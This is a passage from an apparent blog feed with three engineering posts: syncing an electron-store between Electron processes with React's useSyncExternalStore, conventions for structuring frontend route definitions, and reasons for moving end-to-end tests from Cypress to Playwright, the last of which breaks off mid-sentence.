       <title><![CDATA[Creating a synchronized store between main and renderer process in Electron]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron"/>
      <updated>2024-10-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/sync-store-main-renderer-electron</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 1 of the blog series. You can also read<a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>,<a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>,<a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>,<a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>,<a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>,<a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a><a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and<a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>When building desktop applications with <a href="https://electronjs.org/">Electron</a>, oneof the key challenges developers often face is managing the shared state betweenthe <code>main</code> process and multiple <code>renderer</code> processes. While the <code>main</code> processhandles the core application logic, <code>renderer</code> processes are responsible for theuser interface. However, they often need access to the same data, like userpreferences, application state, or session information.</p><p>Electron does not natively provide a way to persist data, let alone give asynchronized state across these processes.</p><h3>electron-store to store data persistently</h3><p>Since Electron doesn't have a built-in way to persist data, We can use<a href="https://github.com/sindresorhus/electron-store">electron-store</a>, an npm packageto store data persistently. <code>electron-store</code> stores the data in a JSON filenamed <code>config.json</code> in <code>app.getPath('userData')</code>.</p><p>Even though we can configure <code>electron-store</code> to be made directly available inthe <code>renderer</code> process, it is recommended not to do so. The best way is toexpose it via<a href="https://www.electronjs.org/docs/latest/tutorial/tutorial-preload">Electron's preload script</a>.</p><p>Let's look at how we can expose the <code>electron store</code> to the renderer via apreload script.</p><pre><code class="language-js">// preload.jsimport { contextBridge, ipcRenderer } from &quot;electron&quot;;const electronHandler = {  store: {    get(key) {      return ipcRenderer.sendSync(&quot;get-store&quot;, key);    },    set(property, val) {      ipcRenderer.send(&quot;set-store&quot;, property, val);    },  },  // ...others code};contextBridge.exposeInMainWorld(&quot;electron&quot;, electronHandler);</code></pre><p>Here, we exposed a <code>set</code> function that calls the <code>ipcRenderer.send</code> method,which just sends a message to the <code>main</code> process. The <code>get</code> function calls the<code>ipcRenderer.sendSync</code> method, which will send a message to the <code>main</code> processwhile expecting a return value.</p><p>Now, let's add <code>ipcMain</code> events to handle these requests in the <code>main</code> process.</p><pre><code class="language-js">import Store from &quot;electron-store&quot;;const store = new Store();ipcMain.on(&quot;get-store&quot;, async (event, val) =&gt; {  event.returnValue = store.get(val);});ipcMain.on(&quot;set-store&quot;, async (_, key, val) =&gt; {  store.set(key, val);});</code></pre><p>In the <code>main</code> process, we created an <code>electron-store</code> instance and added<code>get-store</code> and <code>set-store</code> event handlers to retrieve and set data from thestore.</p><p>Now, we can read and write data from any <code>renderer</code> process without exposing thewhole <code>electron-store</code> class to it.</p><pre><code class="language-js">window.electron.store.set(&quot;key&quot;, &quot;value&quot;);window.electron.store.get(&quot;key&quot;);</code></pre><h2>Synchronization</h2><p>Since we sorted out the storage issue, let's look into how we can synchronizedata between the <code>main</code> process and all its <code>renderer</code> processes.</p><p>Before we start synchronization, let's create a simple utility function that cansend a message to all active <code>renderer</code> processes or, in other words, browserwindows (we will use the terms <code>renderer</code> process and browser windowsinterchangeably).</p><pre><code class="language-js">export const sendToAll = (channel, msg) =&gt; {  BrowserWindow.getAllWindows().forEach(browseWindow =&gt; {    browseWindow.webContents.send(channel, msg);  });};</code></pre><p><code>BrowserWindow.getAllWindows()</code> returns all active browser windows, and<code>browseWindow.webContents.send</code> is the standard way of sending a message from<code>main</code> to a <code>renderer</code> process.</p><h3>electron-store onDidChange</h3><p><code>electron-store</code> provides an option to add an event listener when there is achange in the store called <code>onDidChange</code>. This is the key feature we are goingto use to create synchronization.</p><pre><code class="language-js">store.onDidChange(&quot;key&quot;, newValue =&gt; {  // TODO});</code></pre><p>Not all data needs to be synchronized. So, instead of adding <code>onDidChange</code> toevery field, let's expose an API for the <code>renderer</code> process so that it candecide which data it needs and subscribe to it.</p><pre><code class="language-js">import Store from &quot;electron-store&quot;;const store = new Store();const subscriptions = new Map();ipcMain.on(&quot;get-store&quot;, async (event, val) =&gt; {  event.returnValue = store.get(val);});ipcMain.on(&quot;set-store&quot;, async (_, key, val) =&gt; {  store.set(key, val);});ipcMain.on(&quot;subscribe-store&quot;, async (event, key) =&gt; {  const unsubscribeFn = store.onDidChange(key, newValue =&gt; {    sendToAll(`onChange:${key}`, newValue);  });  subscriptions.set(key, unsubscribeFn);});</code></pre><p>Here, we exposed another API called <code>subscribe-store</code>. When calling that APIwith a key, we listen to that field's <code>onDidChange</code> event. Then, when the<code>onDidChange</code> triggers, we call the <code>sendToAll</code> function we created earlier, andall the <code>renderer</code> processes listening to these changes will be notified withthe latest data. For example, if a field called <code>user</code> is subscribed to changes,we send a message to all <code>renderer</code> processes with the new value on a channelcalled <code>onChange:user.</code> We will soon add code in the <code>renderer</code> process tohandle this.</p><p><code>store.onDidChange</code> returns the <code>unsubscribe</code> function for that particular key.Since we won't be unsubscribing straight away, we need to store this functionfor later use. Here, we are storing it in a hash map against the same key.</p><p>Let's add an option to unsubscribe as well.</p><pre><code class="language-js">//... other codesipcMain.on(&quot;unsubscribe-store&quot;, async (event, key) =&gt; {  subscriptions.get(key)();});</code></pre><h3>Update preload script</h3><p>Let's update the preload script to support the store'ssubscription/unsubscribing.</p><pre><code class="language-js">// preload.jsimport { contextBridge, ipcRenderer } from &quot;electron&quot;;const electronHandler = {  store: {    get(key) {      return ipcRenderer.sendSync(&quot;get-store&quot;, key);    },    set(property, val) {      ipcRenderer.send(&quot;set-store&quot;, property, val);    },    subscribe(key, func) {      ipcRenderer.send(&quot;subscribe-store&quot;, key);      const subscription = (_event, ...args) =&gt; func(...args);      const channelName = `onChange:${key}`;      ipcRenderer.on(channelName, subscription);      return () =&gt; {        ipcRenderer.removeListener(channelName, subscription);      };    },    unsubscribe(key) {      ipcRenderer.send(&quot;unsubscribe-store&quot;, key);    },  },  // ...others code};contextBridge.exposeInMainWorld(&quot;electron&quot;, electronHandler);</code></pre><p>We add two APIs here, <code>subscribe</code> and <code>unsubscribe</code>. While <code>unsubscribe</code> isstraightforward, <code>subscribe</code> might need some explanation. It exposes twoarguments, a store key and a callback function, to be called when there is achange to that field.</p><p>First, we call <code>subscribe-store</code> to subscribe to change to that data field;then, we listen to <code>ipcRenderer.on</code> for any changes. For example, when there isa change to the <code>user</code> field, <code>sendToAll</code> will propagate the change, and here weare listening to it on <code>onChange:user</code>.</p><p>Now, from a <code>renderer</code> process, if it needs to be notified of changes to the<code>user</code> field, we can subscribe to it like below.</p><pre><code class="language-js">window.electron.store.subscribe(&quot;user&quot;, newUser =&gt; {  // TODO});</code></pre><h3>useSyncExternalStore</h3><p>React provides a hook to connect to an external store called<code>useSyncExternalStore</code>. It expects two functions as arguments.</p><ul><li>The <code>subscribe</code> function should subscribe to the store and return anunsubscribe function.</li><li>The <code>getSnapshot</code> function should read a snapshot of the data from the store.</li></ul><p>In the <code>renderer</code> process, create a <code>SyncedStore</code> class with <code>subscribe</code> and<code>getSnapshot</code> functions that <code>useSyncExternalStore</code> expects.</p><pre><code class="language-js">class SyncedStore {  snapshot;  defaultValue;  storageKey;  constructor(defaultValue = &quot;&quot;, storageKey) {    this.defaultValue = defaultValue;    this.snapshot = window.electron.store.get(storageKey) ?? defaultValue;    this.storageKey = storageKey;  }  getSnapshot = () =&gt; this.snapshot;  subscribe = callback =&gt; {    // TODO  };}</code></pre><p>Here, we created a generic class that takes a <code>defaultValue</code> and <code>storageKey</code>.While creating the object, we loaded the existing data for that field from the<code>main</code> store.</p><p>When React tries to subscribe to this using <code>useSyncExternalStore</code>, we need tocall our <code>main</code> store's subscribe.</p><pre><code class="language-js">class SyncedStore {  snapshot;  defaultValue;  storageKey;  constructor(defaultValue = &quot;&quot;, storageKey) {    this.defaultValue = defaultValue;    this.snapshot = window.electron.store.get(storageKey) ?? defaultValue;    this.storageKey = storageKey;  }  getSnapshot = () =&gt; this.snapshot;  subscribe = callback =&gt; {    window.electron.store.subscribe(this.storageKey, callback);    return () =&gt; {      window.electron.store.unsubscribe(this.storageKey);    };  };}</code></pre><p>We have our <code>SyncedStore</code> ready, but it's a bit inefficient; for example, if weare subscribed to the same <code>storageKey</code> in multiple places, it will create asubscription for each instance in the main store. That is needless IPCcommunications for the same data.</p><p>Let's improve this a bit so that only one subscription is registered per browserwindow(<code>renderer</code> process), and if there are multiple use cases of the same,let's handle it internally.</p><pre><code class="language-js">class SyncedStore {  snapshot;  defaultValue;  storageKey;  listeners = new Set();  constructor(defaultValue = &quot;&quot;, storageKey) {    this.defaultValue = defaultValue;    this.snapshot = window.electron.store.get(storageKey) ?? defaultValue;    this.storageKey = storageKey;  }  getSnapshot = () =&gt; this.snapshot;  onChange = newValue =&gt; {    if (JSON.stringify(newValue) === JSON.stringify(this.snapshot)) return;    this.snapshot = newValue ?? this.defaultValue;    this.listeners.forEach(listener =&gt; listener());  };  subscribe = callback =&gt; {    this.listeners.add(callback);    if (this.listeners.size === 1) {      window.electron.store.subscribe(this.storageKey, this.onChange);    }    return () =&gt; {      this.listeners.delete(callback);      if (this.listeners.size !== 0) return;      window.electron.store.unsubscribe(this.storageKey);    };  };}</code></pre><p>We made the change so that only one request is sent to <code>main</code>; the rest of thesubscriptions are stored internally and respond to it when the first one isnotified.</p><p>We also added additional checks to ensure that rerender is not triggered ifthere are no changes to the data.</p><h3>Usage</h3><p>Now, whenever a synchronized store for a field is needed, we just need to createan instance of this class and pass it to <code>useSyncExternalStore</code>.</p><pre><code class="language-js">import { useSyncExternalStore } from &quot;react&quot;;const createSyncedStore = ({ defaultValue, storageKey }) =&gt; {  const store = new SyncedStore(defaultValue, storageKey);  return () =&gt; useSyncExternalStore(store.subscribe, store.getSnapshot);};const useUser = createSyncedStore({  storageKey: &quot;user&quot;,  defaultValue: { firstName: &quot;Oliver&quot;, lastName: &quot;Smith&quot; },});const App = () =&gt; {  const user = useUser();  return &lt;div&gt;Name: {`${user.firstName} ${user.lastName}`}&lt;/div&gt;;};</code></pre><p>Now, if we update the <code>user</code> field from anywhere, let it be from any <code>renderer</code>process or <code>main</code>.</p><pre><code class="language-js">window.electron.store.set(&quot;user&quot;, { firstName: &quot;John&quot;, lastName: &quot;Smith&quot; });</code></pre><p>The above <code>App</code> component will be rerendered with the latest user data.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Standardizing frontend routes and dynamic URL generation in Neeto products]]></title>
       <author><name>Navaneeth D</name></author>
      <link href="https://www.bigbinary.com/blog/standardizing-frontend-routes"/>
      <updated>2024-09-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/standardizing-frontend-routes</id>
      <content type="html"><![CDATA[<p>We often benefit from the ability to easily identify which component is renderedby simply examining the application UI. By consistently defining routes andmapping them to components, we can easily locate the rendered component bysearching for the corresponding route. This practice also helps us understandthe component's behavior, including when it is rendered and the events leadingup to it.</p><p>This blog post explores a standardized approach to defining frontend routes. Thegoal is to enhance the searchability of components based on the URL structure.<a href="https://www.neeto.com/">Neeto</a> has adopted a structured and hierarchicalapproach to defining frontend routes, prioritizing navigational clarity andensuring consistency and scalability throughout its application ecosystem. Let'shave a closer look at this structure.</p><h3>Structuring the routes</h3><p>The philosophy behind route structure is to create a clear, hierarchical, andorganized way of defining routes for a web application. Let's understand how, atNeeto, we follow this philosophy with an example. Given below is the routedefinition of a meeting scheduling application like<a href="https://www.neeto.com/neetocal">NeetoCal</a>.</p><pre><code class="language-jsx">const routes = {  login: &quot;/login&quot;,  admin: {    meetingLinks: {      index: &quot;/admin/meeting-links&quot;,      show: &quot;/admin/meeting-links/:id&quot;,      design: &quot;/admin/meeting-links/:id/design&quot;,      new: {        index: &quot;/admin/meeting-links/new&quot;,        what: &quot;/admin/meeting-links/new/what&quot;,        type: &quot;/admin/meeting-links/new/type&quot;,      },    },  },};</code></pre><p>The routes here are organized hierarchically to reflect the logical structure ofthe application. Each nested level represents a deeper level of specificity orfunctionality. For instance, under the <code>admin</code> route, there are further nestedroutes for <code>meetingLinks</code>, and within <code>meetingLinks</code>, there are routes forspecific actions like <code>index</code> and <code>show</code>. This indicates that the admin panel ofthe application includes provisions for listing meeting links and showingdetails of individual meeting links.</p><p>These routes also follow RESTful principles, whenever possible, by usingdescriptive and meaningful path names. The paths indicate the resource beingaccessed and the action being performed. For example:</p><ul><li><code>index</code> routes like <code>/admin/meeting-links</code> is for listing resources.</li><li><code>show</code> routes like <code>/admin/meeting-links/:id</code> is for viewing a specificresource.</li><li>Action-specific routes like <code>/admin/meeting-links/:id/design</code> is forperforming actions on a specific resource.</li></ul><p>By defining routes in a nested object structure, it becomes clear how routes arerelated. This improves readability and maintainability. The nested structureallows for easy scalability as well. New routes can be added in a logical placewithin the hierarchy without disrupting the existing structure. For example, ifa new action needs to be added to meeting-links, it can be easily included underthe appropriate <code>new</code> subroute.</p><p>String interpolation should be strictly avoided in the path values. Otherwisethey can lead to inconsistencies in route definitions and make searchingdifficult.</p><p>At Neeto, we have an ESLint rule <code>routes-should-match-object-path</code> in<code>@bigbinary/eslint-plugin-neeto</code> which ensures that the path value matches thekey. Let's take a few examples to discuss this ESLint rule.</p><p>In the above case we have the key <code>routes.admin.meetingLinks.index</code>. The pathfor that key is <code>/admin/meeting-links</code>. What if I change the path value from<code>/admin/meeting-links</code> to <code>/admin/meeting-urls</code>. If we do that then ESLint willthrow an error because now the key will not match with the path.</p><p>Since the key has the value <code>meetingLinks</code> the path can be either<code>meeting-links</code> or <code>meeting_links</code>. But the path can't be <code>meetinglinks</code>.Because then <code>L</code> will not be camelcased on the key side and that will throw anderror by ESLint.</p><p>Similarly if we have the key <code>routs.admin.meetingLinks.video</code> then the path mustbe <code>/admin/meeting-links/video</code>.</p><h3>Usage of index key</h3><p>Imagine we're enhancing our application by introducing a feature that lists allavailable time slots for scheduling meetings with a person. This scenariorequires an <code>index</code> action. However, if listing is the sole action within the<code>availabilities</code> context, there's no need to explicitly use the <code>index</code> key.Instead, we can directly use <code>availabilities</code> as the key for the path.</p><pre><code class="language-jsx">const routes = {  // rest of the routes  admin: {    availabilities: &quot;/admin/availabilities&quot;,    // rest of the routes  },};</code></pre><p>However, if we plan to support multiple actions under the <code>availabilities</code>scope, we will need to use the <code>index</code> key to differentiate between actions.</p><pre><code class="language-jsx">const routes = {  // rest of the routes  admin: {    availabilities: {      index: &quot;/admin/availabilities&quot;,      show: &quot;/admin/availabilities/:id&quot;,    },    // rest of the routes  },};</code></pre><h3>Improving searchability</h3><p>The structured route definitions can significantly enhance the ease of searchingfor specific route keys. Let's see how this works in practice.</p><p>Assume you are on the <code>/admin/meeting-links</code> page of the application, asindicated by the address bar in the browser. To determine the componentassociated with this route follow these steps:</p><ul><li><p>Generate the key by replacing all forward slashes with periods and convert thepath to camelCase. We adhere to camelCase for all path keys to ensureconsistency. Thus, <code>/admin/meeting-links</code> becomes <code>admin.meetingLinks</code>.</p></li><li><p>By examining the page associated with <code>/admin/meeting-links</code>, we can determineif multiple actions exist under the <code>meeting-links</code> scope. If multiple actionsexists, then append <code>.index</code> to the key. If listing is the only action,<code>admin.meetingLinks</code> will suffice. Let's say there are multiple actions likeshowing details or editing, under the <code>meeting-links</code> scope. So we should use<code>admin.meetingLinks.index</code> as the key for searching.</p></li><li><p>Use this formatted key to search in your preferred code editor. This searchshould help you locate the relevant route definitions and associatedcomponents.</p></li></ul><h3>Avoid nesting for dynamic routes</h3><p>When dealing with dynamic elements like <code>:id</code> in route paths, avoiding nestingcan enhance searchability and maintain consistency across different parts of theapplication.</p><p>Consider a scenario where we need to manage various aspects of meeting links inan admin panel. Each meeting link has a unique identifier <code>:id</code>, and we want tocreate routes for actions like viewing details, designing, and managing membersof these meeting links. Initially, we might be tempted to nest these actionsunder <code>id</code> as shown below:</p><pre><code class="language-jsx">const routes = {  // rest of the routes  admin: {    // rest of the routes    meetingLinks: {      index: &quot;/admin/meeting-links&quot;,      id: {        show: &quot;/admin/meeting-links/:id&quot;,        design: &quot;/admin/meeting-links/:id/design&quot;,        members: &quot;/admin/meeting-links/:id/members&quot;,      },    },    // rest of the routes  },};</code></pre><p>This structure appears logical but has a critical flaw. The goal of structuredrouting is to enhance searchability. In this scenario, if a developer sees apath like <code>/admin/meeting-links/9482af15-9443-42d1-9b3d-61daeadf6982/design</code> inthe browser's address bar, they might search for<code>routes.admin.meetingLinks.meetingId.design</code> or<code>routes.admin.meetingLinks.mId.design</code> to find the associated component.However, neither of these searches would yield relevant results because theactual key is <code>routes.admin.meetingLinks.id.design</code>. This confusion arisesbecause we allowed for assumptions about the key used for the dynamic part ofthe route.</p><p>By avoiding the use of dynamic elements in nested object path, we can preventthis issue. Here's how the corrected nesting should look:</p><pre><code class="language-jsx">const routes = {  // rest of the routes  admin: {    // rest of the routes    meetingLinks: {      index: &quot;/admin/meeting-links&quot;,      show: &quot;/admin/meeting-links/:id&quot;,      design: &quot;/admin/meeting-links/:id/design&quot;,      members: &quot;/admin/meeting-links/:id/members&quot;,    },    // rest of the routes  },};</code></pre><p>This approach ensures that the routes are structured logically and predictably.Now the developer won't face any confusion since the key<code>routes.admin.meetingLinks.design</code> will not have any dynamic elements in it.</p><h3>File structure</h3><p>To maintain consistency and organization, route definitions should be placed ina centralized file, <code>src/routes.js</code>. The routes should be defined as a constantand exported as the default export like given below:</p><pre><code class="language-jsx">const routes = {  login: &quot;/login&quot;,  admin: {    availabilities: {      index: &quot;/admin/availabilities&quot;,      show: &quot;/admin/availabilities/:id&quot;,    },    meetingLinks: {      index: &quot;/admin/meeting-links&quot;,      show: &quot;/admin/meeting-links/:id&quot;,      design: &quot;/admin/meeting-links/:id/design&quot;,      new: {        index: &quot;/admin/meeting-links/new&quot;,        what: &quot;/admin/meeting-links/new/what&quot;,        type: &quot;/admin/meeting-links/new/type&quot;,      },    },  },};export default routes;</code></pre><p>This approach allows for easy importing and ensures that IntelliSense canauto-complete the fields, enhancing developer productivity.</p><h3>Using the route keys in the application</h3><p>Usage of the routes within the application is as equally important as definingthem to catalyze searchability. Let's take a look at some of the concepts toconsider while using routes keys in the application.</p><p>Firstly, do not destructure keys in the route object when you utilize them invarious parts of the application, like below:</p><pre><code class="language-jsx">const {  admin: { meetingLinks: index },} = routes;history.push(index);</code></pre><p>It can hamper searchability. Maintain the complete route path as a single key toensure clarity and ease of searching.</p><p>Secondly, during in-page navigation, we must use the route keys instead ofhardcoded strings. This practice not only enhances searchability but alsominimizes the risk of errors due to typos or incorrect paths.</p><pre><code class="language-jsx">// Navigate to the meeting links index pagehistory.push(routes.admin.meetingLinks.index);</code></pre><p>When dealing with dynamic parameters in URLs, we can make use of the <code>buildUrl</code>function from <code>@bigbinary/neeto-commons-frontend</code>.<code>@bigbinary/neeto-commons-frontend</code> is a library that packages commonboilerplate frontend code necessary for all Neeto products. The <code>buildUrl</code>function builds a URL by inflating a route-like template string, say<code>/admin/meeting-links/:id/design</code>, using the provided parameters. It allows youto create URLs dynamically based on a template and replace placeholders withactual values. Any additional properties in the parameters will be transformedto snake case and attached as query parameters to the URL.</p><pre><code class="language-jsx">buildUrl(routes.admin.meetingLinks.design, { id: &quot;123&quot; }); // output: `/admin/meeting-links/123/design`buildUrl(routes.admin.meetingLinks.design, { id: &quot;123&quot;, search: &quot;abc&quot; }); // output: `/admin/meeting-links/123/design?search=abc`</code></pre><p>The <code>@bigbinary/eslint-plugin-neeto</code> used within the Neeto ecosystem features arule called <code>use-common-routes</code> that disallows the usage of strings and templateliterals in the path prop of <code>Route</code> component and in the <code>to</code> prop of <code>Link</code>,<code>NavLink</code>, and <code>Redirect</code> components. It also prevents the usage of strings andtemplate literals in <code>history.push()</code> and <code>history.replace()</code> methods.</p><h3>Edge cases to consider</h3><p>Even with a structured approach, you may encounter scenarios where adhering tothe guidelines is challenging. Let's explore some of these scenarios and how toensure minimal searchability in such cases.</p><h4>Routes starting with a dynamic element</h4><p>We have discussed omitting intermittent dynamic contents in paths. However, whenthere are actions with paths beginning with a dynamic element, we can group themunder a meaningful name. While this might hinder searchability, it allows thecode editor to partially match the routes. Consider the below case:</p><pre><code class="language-jsx">const routes = {  login: &quot;/login&quot;,  calendar: {    show: &quot;/:slug&quot;,    preBook: {      index: &quot;/:slug/pre-book&quot;,    },    cancellationPolicy: &quot;/:slug/cancellation-policy&quot;,    troubleshoot: &quot;/:slug/troubleshoot&quot;,  },  admin: {    // Rest of the routes  },};export default routes;</code></pre><p>Here, <code>calendar</code> is the name chosen to group all actions whose paths start withthe dynamic element <code>:slug</code>.</p><h4>Routes ending with consecutive dynamic elements</h4><p>Consider the path <code>/bookings/:bookingId/:view</code>. Using <code>routes.bookings.show</code> cancause confusion and omit important information about the dynamic element<code>:view</code>. In such cases, we can use a meaningful name to group the last dynamicelement. Here is how the object would look:</p><pre><code class="language-jsx">const routes = {  // Rest of the routes  bookings: {    views: {      show: &quot;/bookings/:bookingId/:view&quot;,    },  },  admin: {    // Rest of the routes  },};export default routes;</code></pre><p>Here, the key <code>routes.bookings.views.show</code> is used. By allowing any meaningfulname in place of <code>views</code>, we maintain partial searchability.</p><h4>Routes with intermittent consecutive dynamic elements</h4><p>When paths contain consecutive dynamic elements, such as<code>/bookings/:bookingId/:view/time</code>, we can omit the dynamic elements directly.Here is how the route would look:</p><pre><code class="language-jsx">const routes = {  // Rest of the routes  bookings: {    time: &quot;/bookings/:bookingId/:view/time&quot;,  },  admin: {    // Rest of the routes  },};export default routes;</code></pre><p>With that, we come to the end of the discussion on structuring frontend routes.Standardizing frontend routes and dynamic URL generation improves searchability,maintainability, and scalability. By following a structured, hierarchicalapproach and utilizing tools like the <code>buildUrl</code> function, developers canefficiently manage and navigate the application's routing system.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Why we switched from Cypress to Playwright]]></title>
       <author><name>S Varun</name></author>
      <link href="https://www.bigbinary.com/blog/why-we-switched-from-cypress-to-playwright"/>
      <updated>2024-09-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/why-we-switched-from-cypress-to-playwright</id>
      <content type="html"><![CDATA[<p>Until early 2024, <a href="https://cypress.io">Cypress</a> used to be the most downloadedend-to-end (e2e) testing framework in JavaScript. Since then, it has seen asteep decline in popularity and <a href="https://playwright.dev">Playwright</a> hasovertaken it as the most downloaded end-to-end testing framework.</p><p>We at BigBinary also switched from Cypress to Playwright in late 2023. In thisarticle, we will see some critical reasons for this change in trends and ourpersonal views on why we think Playwright is the superior JavaScript testingframework.</p><p>&lt;div style=&quot;width:100%;max-width:600px;margin:auto;display:grid;grid-template-columns:auto auto;gap:2rem;align-items:end;&quot;&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;imgwidth=&quot;1000&quot;height=&quot;600&quot;alt=&quot;Cypress weekly downloads early 2024&quot;src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/cypress-weekly-downloads-early-2024.png&quot;/&gt;&lt;figcaption style=&quot;font-size:x-small;&quot;&gt;Cypress weekly downloads - Early 2024&lt;/figcaption&gt;&lt;/figure&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;imgwidth=&quot;1000&quot;height=&quot;600&quot;alt=&quot;Playwright weekly downloads early 2024&quot;src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/playwright-weekly-downloads-early-2024.png&quot;/&gt;&lt;figcaption style=&quot;font-size:x-small;&quot;&gt;Playwright weekly downloads - Early 2024&lt;/figcaption&gt;&lt;/figure&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;imgwidth=&quot;1000&quot;height=&quot;600&quot;alt=&quot;Cypress weekly downloads September 2024&quot;src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/cypress-weekly-downloads-september-2024.png&quot;/&gt;&lt;figcaption style=&quot;font-size:x-small;&quot;&gt;Cypress weekly downloads - September 2024&lt;/figcaption&gt;&lt;/figure&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;imgwidth=&quot;1200&quot;height=&quot;800&quot;alt=&quot;Playwright weekly downloads September 2024&quot;src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/playwright-weekly-downloads-september-2024.png&quot;/&gt;&lt;figcaption style=&quot;font-size:x-small;&quot;&gt;Playwright weekly downloads - September 2024&lt;/figcaption&gt;&lt;/figure&gt;&lt;/div&gt;</p><h2>Why we chose Cypress initially</h2><p>At BigBinary, we are building a number of products at<a href="https://www.neeto.com">Neeto</a>. When the number of products in our product suitegrew and the complexity of each one increased, we needed an automated end-to-endsolution to ensure our applications were stable since manual testing was nolonger viable.</p><p>When the discussion about choosing the e2e testing framework began in mid-2020,a few names emerged, including top players like Selenium and Cypress, and newplayers like Playwright. We chose Cypress owing to its popularity andsimplicity.</p><p>We were satisfied with its overall performance and easy learning curve. We choseCypress as our primary e2e testing framewor,k and wrote extensive e2e tests forthe entire application suite. While things were smooth sailing initially, wesoon encountered many issues with Cypress.</p><h2>Why we decided to switch to Playwright</h2><p>In late August 2023, Cypress released version 13, a major upgrade to theframework that brought along many new features. As Cypress users, we wereoverjoyed. But the excitement quickly turned to frustration when we realizedthat, along with the latest features, Cypress had introduced a few changes thatwere not so open-source in nature.</p><p>It's a known fact that <a href="https://www.cypress.io/cloud">Cypress Cloud</a> is a veryexpensive platform. A few third-party providers like<a href="https://currents.dev">Currents.dev</a> and <a href="https://testomat.io/">Testomat</a>provided similar services at much more affordable costs. However, Cypressversion 13 blocked all third-party reporters. The main reason offered by theCypress team was that Cypress Cloud was their primary source of income and thatthey had to block the third-party tools to survive in the market. They laterrevised this explanation with other arguments on how these third-party reportersmisused the Cypress name for personal gain due to public backlash.</p><p>We had switched to Currents.dev ourselves a few months prior to the event andwere affected by this change. At that point, we had two options: switch toCypress Cloud and incur the additional cost, or stay with Currents.dev but getlocked into an older version of Cypress permanently.</p><p>Both of these choices were unacceptable to us. This was the final nudge weneeded to switch to a new framework. We were already dissatisfied with manyissues with Cypress, so we took advantage of the opportunity to research thebest e2e testing framework available and switch to that. We compared all thepopular frameworks available and observed how they solved our pain points withCypress. That is when we fell in love with Playwright.</p><p>In our comparison, Playwright was the fastest framework in terms of rawperformance and had the highest adoption rate compared to all the otherframeworks. It is an open-source framework maintained by Microsoft. Thearchitecture would enable us to automate more scenarios that were deemedunautomatable using Cypress. We were thrilled to learn that Playwright would fixmost of the issues we faced with Cypress.</p><h3>Features locked behind a paywall and control over third-party software</h3><p>While Cypress supports parallelism and orchestration, it is blocked behind apaywall with a subscription to Cypress Cloud. This means these features, whichcan easily be implemented with the base Cypress package, are only accessiblethrough an external package.</p><p>While Cypress provides APIs for reporters and orchestration, it deliberatelyblocks popular third-party tools and services. That's not a good open sourcepractice. The combination of both makes Cypress an incomplete tool withoutsubscribing to the expensive Cypress Cloud plans, even though the tool isconsidered free and open-source.</p><p>At the same time, Playwright is an entirely open framework in which anyone cancreate and publish third-party reporters. It comes in-built with features suchas parallelization, sharding and orchestration without needing third-party toolsand services. The Playwright team goes a step further by showcasing the popularthird-party reporters on their official documentation.</p><h3>Performance</h3><p>Cypress is the slowest of the e2e testing frameworks available in JS. Here isthe list of the most popular frameworks in decreasing order of performance.</p><p>&lt;div style=&quot;width:100%;display:flex;justify-content:center;&quot;&gt;&lt;imgalt=&quot;Speed comparison of popular JS testing frameworks&quot;src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/speed-comparison-of-testing-frameworks.png&quot;/&gt;&lt;/div&gt;</p><p>&lt;br /&gt;</p><p>Let's compare the performance when the same scenario is implemented in Cypressand Playwright. The scenario is to visit the <a href="https://neeto.com">Neeto homepage</a>and verify the page title.</p><pre><code class="language-js">// Cypresscy.visit(&quot;https://neeto.com&quot;);cy.title().should(&quot;eq&quot;, &quot;Neeto: Get things done&quot;);</code></pre><pre><code class="language-ts">// Playwrightawait page.goto(&quot;https://neeto.com&quot;);expect(await page.title()).toBe(&quot;Neeto: Get things done&quot;);</code></pre><p>The results speak for themselves. While Cypress took <strong>16.09 seconds</strong> to finishthe execution, Playwright took only <strong>1.82 seconds</strong>. This is an improvement of<strong>88.68%</strong>! Here, the execution time combines the time taken for setup and thetime to complete the test. This is the actual time that matters because this isthe time an engineer has to wait until they see the final test result.</p><p>&lt;div&gt;&lt;br /&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;imgalt=&quot;Cypress weekly downloads early 2024&quot;src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/cypress-execution-time.png&quot;/&gt;&lt;figcaption style=&quot;font-size:small;&quot;&gt;Cypress execution&lt;/figcaption&gt;&lt;/figure&gt;&lt;br /&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;imgalt=&quot;Cypress weekly downloads early 2024&quot;src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/playwright-execution-time.png&quot;/&gt;&lt;figcaption style=&quot;font-size:small;&quot;&gt;Playwright execution&lt;/figcaption&gt;&lt;/figure&gt;&lt;br /&gt;&lt;/div&gt;</p><p>This shows how much of a performance gain switching to 